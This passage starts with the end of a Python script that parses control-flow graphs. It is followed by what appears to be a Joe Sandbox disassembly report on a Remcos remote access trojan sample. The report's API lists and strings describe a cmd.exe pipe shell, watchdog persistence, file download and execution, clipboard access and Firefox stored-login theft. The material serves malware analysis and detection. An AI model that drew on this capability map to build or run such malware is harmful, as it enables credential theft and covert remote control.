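            cur.calls.append(int(tokens[i], 16))
        elif tok.isdigit():
            # A decimal block id is always followed by its address range; a block
            # holding a single instruction is printed with one address and no dash.
            i += 1
            rng = _ADDR_RANGE_RE.match(tokens[i])
            if rng is None:
                raise ValueError(f"block {tok} not followed by an address range: {tokens[i]!r}")
            start = int(rng.group(1), 16)
            end = int(rng.group(2) or rng.group(1), 16)
            cur = Block(int(tok), start, end)
            blocks[cur.bid] = cur
        else:
            if cur is None:
                raise ValueError(f"API name {tok!r} appears before any block")
            cur.apis.append(tok)
        i += 1
    return blocks, edges


def entry_blocks(blocks, edges):
    """Block ids with no incoming edge (the function entry for a well-formed graph)."""
    targets = {dst for _, dst in edges}
    return sorted(b for b in blocks if b not in targets)


def exit_blocks(blocks, edges):
    """Block ids with no outgoing edge (returns, or tails the disassembler did not follow)."""
    sources = {src for src, _ in edges}
    return sorted(b for b in blocks if b not in sources)


def api_blocks(blocks):
    """Map each API name to the sorted ids of the blocks that execute it."""
    where = {}
    for b in blocks.values():
        for api in b.apis:
            where.setdefault(api, []).append(b.bid)
    return {api: sorted(ids) for api, ids in sorted(where.items())}


def summarize(text):
    blocks, edges = parse_cfg(text)
    return {
        "blocks": len(blocks),
        "edges": len(edges),
        "entry": entry_blocks(blocks, edges),
        "exit": exit_blocks(blocks, edges),
        "apis": api_blocks(blocks),
        "calls": sorted({f"{c:x}" for b in blocks.values() for c in b.calls}),
    }


if __name__ == "__main__":
    for name, cfg in (("CreateMutexA", MUTEX_CFG), ("LoadLibraryExW", LOADLIB_CFG)):
        print(name, summarize(cfg))
```

Running it over the LoadLibraryExW graph shows a FreeLibrary call in block 103 (4485d3-4485d4) that the APIs list printed for that function does not mention, which is why the serialized graph is worth keeping next to the API list rather than treating it as noise.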

                  Control-flow Graph

                  control_flow_graph 123 44edc4-44edf8 GetCPInfo 124 44eeee-44eefb 123->124 125 44edfe 123->125 126 44ef01-44ef11 124->126 127 44ee00-44ee0a 125->127 128 44ef13-44ef1b 126->128 129 44ef1d-44ef24 126->129 127->127 130 44ee0c-44ee1f 127->130 131 44ef30-44ef32 128->131 132 44ef34 129->132 133 44ef26-44ef2d 129->133 134 44ee40-44ee42 130->134 137 44ef36-44ef45 131->137 132->137 133->131 135 44ee44-44ee7b call 45112c call 44ae66 134->135 136 44ee21-44ee28 134->136 148 44ee80-44eeab call 44ae66 135->148 140 44ee37-44ee39 136->140 137->126 139 44ef47-44ef57 call 434fcb 137->139 141 44ee2a-44ee2c 140->141 142 44ee3b-44ee3e 140->142 141->142 145 44ee2e-44ee36 141->145 142->134 145->140 151 44eead-44eeb7 148->151 152 44eec7-44eec9 151->152 153 44eeb9-44eec5 151->153 155 44eee0 152->155 156 44eecb-44eed0 152->156 154 44eed7-44eede 153->154 157 44eee7-44eeea 154->157 155->157 156->154 157->151 158 44eeec 157->158 158->139
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                  • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                  • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                  • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65

                  Control-flow Graph

                  control_flow_graph 159 448710-448732 call 4484ca 161 448737-44873e 159->161 162 448740-44874d 161->162 163 44874f TlsAlloc 161->163 164 448755-448763 call 434fcb 162->164 163->164
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: b4f4d605eb291f9a0e31a3fdb19c0b64c96dd805d6feba376a353fba0474839d
                  • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                  • Opcode Fuzzy Hash: b4f4d605eb291f9a0e31a3fdb19c0b64c96dd805d6feba376a353fba0474839d
                  • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE

                  Control-flow Graph

                  control_flow_graph 169 438d94-438da9 call 438c73 171 438dae-438db5 169->171 172 438db7-438dc5 call 434b9c 171->172 173 438dc6-438dc8 TlsAlloc 171->173
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 00438DA9
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                  • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                  • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                  • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE

                  Control-flow Graph

                  control_flow_graph 177 44f119-44f13d call 44ecec 180 44f14d-44f154 177->180 181 44f13f-44f148 call 44ed5f 177->181 183 44f157-44f15d 180->183 188 44f2fa-44f309 call 434fcb 181->188 185 44f163-44f16f 183->185 186 44f24d-44f26c call 436e90 183->186 185->183 189 44f171-44f177 185->189 194 44f26f-44f274 186->194 192 44f245-44f248 189->192 193 44f17d-44f183 189->193 197 44f2f9 192->197 193->192 196 44f189-44f195 IsValidCodePage 193->196 198 44f276-44f27b 194->198 199 44f2ab-44f2b5 194->199 196->192 200 44f19b-44f1a8 GetCPInfo 196->200 197->188 201 44f27d-44f283 198->201 202 44f2a8 198->202 199->194 205 44f2b7-44f2de call 44ecae 199->205 203 44f232-44f238 200->203 204 44f1ae-44f1cf call 436e90 200->204 206 44f29c-44f29e 201->206 202->199 203->192 207 44f23a-44f240 call 44ed5f 203->207 217 44f1d1-44f1d8 204->217 218 44f222 204->218 219 44f2df-44f2ee 205->219 210 44f285-44f28b 206->210 211 44f2a0-44f2a6 206->211 221 44f2f6-44f2f7 207->221 210->211 215 44f28d-44f298 210->215 211->198 211->202 215->206 222 44f1da-44f1df 217->222 223 44f1fb-44f1fe 217->223 220 44f225-44f22d 218->220 219->219 224 44f2f0-44f2f1 call 44edc4 219->224 220->224 221->197 222->223 227 44f1e1-44f1e7 222->227 226 44f203-44f20a 223->226 224->221 226->226 229 44f20c-44f220 call 44ecae 226->229 228 44f1ef-44f1f1 227->228 230 44f1f3-44f1f9 228->230 231 44f1e9-44f1ee 228->231 229->220 230->222 230->223 231->228
                  APIs
                    • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                  • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                  • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                  • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                  • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99

                  Control-flow Graph

                  control_flow_graph 234 44ef58-44ef82 call 448215 call 44f077 call 44ecec 241 44ef84-44ef86 234->241 242 44ef88-44ef9d call 446137 234->242 243 44efdb-44efde 241->243 246 44efcd 242->246 247 44ef9f-44efb5 call 44f119 242->247 249 44efcf-44efda call 446782 246->249 250 44efba-44efc0 247->250 249->243 252 44efc2-44efc7 call 4405dd 250->252 253 44efdf-44efe3 250->253 252->246 256 44efe5 call 444636 253->256 257 44efea-44eff5 253->257 256->257 259 44eff7-44f001 257->259 260 44f00c-44f026 257->260 259->260 262 44f003-44f00b call 446782 259->262 260->249 263 44f028-44f02f 260->263 262->260 263->249 265 44f031-44f048 call 44ebc2 263->265 265->249 269 44f04a-44f054 265->269 269->249
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                    • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                    • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                  • _free.LIBCMT ref: 0044EFD0
                  • _free.LIBCMT ref: 0044F006
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: baf0a310567cc30cb88d0d4a2d208f706047bc877cc458132e60af230d18bea0
                  • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                  • Opcode Fuzzy Hash: baf0a310567cc30cb88d0d4a2d208f706047bc877cc458132e60af230d18bea0
                  • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48

                  Control-flow Graph

                  control_flow_graph 270 4484ca-4484f4 271 4484f6-4484f8 270->271 272 44855f 270->272 273 4484fe-448504 271->273 274 4484fa-4484fc 271->274 275 448561-448565 272->275 276 448506-448508 call 448566 273->276 277 448520 273->277 274->275 280 44850d-448510 276->280 279 448522-448524 277->279 281 448526-448534 GetProcAddress 279->281 282 44854f-44855d 279->282 283 448541-448547 280->283 284 448512-448518 280->284 285 448536-44853f call 43436e 281->285 286 448549 281->286 282->272 283->279 284->276 287 44851a 284->287 285->274 286->282 287->277
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                  • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                  • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                  • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

                  Control-flow Graph

                  control_flow_graph 290 40165e-401664 291 401666-401668 290->291 292 401669-401674 290->292 293 401676 292->293 294 40167b-401685 292->294 293->294 295 401687-40168d 294->295 296 4016a8-4016a9 call 4344ea 294->296 295->296 298 40168f-401694 295->298 299 4016ae-4016af 296->299 298->293 300 401696-4016a6 call 4344ea 298->300 301 4016b1-4016b3 299->301 300->301
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                  • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                  • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                  • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

                  Control-flow Graph

                  control_flow_graph 304 43a3ec-43a3f1 call 438d94 306 43a3f6-43a3ff 304->306 307 43a401-43a403 306->307 308 43a404-43a413 call 438e42 306->308 311 43a415-43a41a call 43a41f 308->311 312 43a41c-43a41e 308->312 311->307
                  APIs
                    • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                  • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                  • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                  • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                  APIs
                    • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                  • _free.LIBCMT ref: 00450140
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap_free
                  • String ID:
                  • API String ID: 614378929-0
                  • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                  • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                  • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                  • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                  • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                  • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                  • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                  • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                  • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                  • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                  APIs
                  • SetEvent.KERNEL32(?,?), ref: 00407CB9
                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                  • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                    • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                    • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                    • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                  • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                  • DeleteFileA.KERNEL32(?), ref: 00408652
                    • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                    • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                    • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                    • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                  • Sleep.KERNEL32(000007D0), ref: 004086F8
                  • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                    • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                  • API String ID: 1067849700-181434739
                  • Opcode ID: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                  • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                  • Opcode Fuzzy Hash: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                  • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 004056E6
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • __Init_thread_footer.LIBCMT ref: 00405723
                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                  • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                  • CloseHandle.KERNEL32 ref: 00405A23
                  • CloseHandle.KERNEL32 ref: 00405A2B
                  • CloseHandle.KERNEL32 ref: 00405A3D
                  • CloseHandle.KERNEL32 ref: 00405A45
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                  • API String ID: 2994406822-18413064
                  • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                  • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                  • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                  • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                  APIs
                  • GetCurrentProcessId.KERNEL32 ref: 00412106
                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                    • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                    • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                  • OpenMutexA.KERNEL32 ref: 00412146
                  • CloseHandle.KERNEL32(00000000), ref: 00412155
                  • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                  • API String ID: 3018269243-13974260
                  • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                  • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                  • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                  • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                  • FindClose.KERNEL32(00000000), ref: 0040BBC9
                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                  • FindClose.KERNEL32(00000000), ref: 0040BD12
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$CloseFile$FirstNext
                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                  • API String ID: 1164774033-3681987949
                  • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                  • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                  • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                  • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                  APIs
                  • OpenClipboard.USER32 ref: 004168C2
                  • EmptyClipboard.USER32 ref: 004168D0
                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                  • GlobalLock.KERNEL32 ref: 004168F9
                  • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                  • SetClipboardData.USER32 ref: 00416938
                  • CloseClipboard.USER32 ref: 00416955
                  • OpenClipboard.USER32 ref: 0041695C
                  • GetClipboardData.USER32 ref: 0041696C
                  • GlobalLock.KERNEL32 ref: 00416975
                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                  • CloseClipboard.USER32 ref: 00416984
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                  • String ID: !D@
                  • API String ID: 3520204547-604454484
                  • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                  • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                  • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                  • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                  • FindClose.KERNEL32(00000000), ref: 0040BDC9
                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                  • FindClose.KERNEL32(00000000), ref: 0040BEAF
                  • FindClose.KERNEL32(00000000), ref: 0040BED0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Close$File$FirstNext
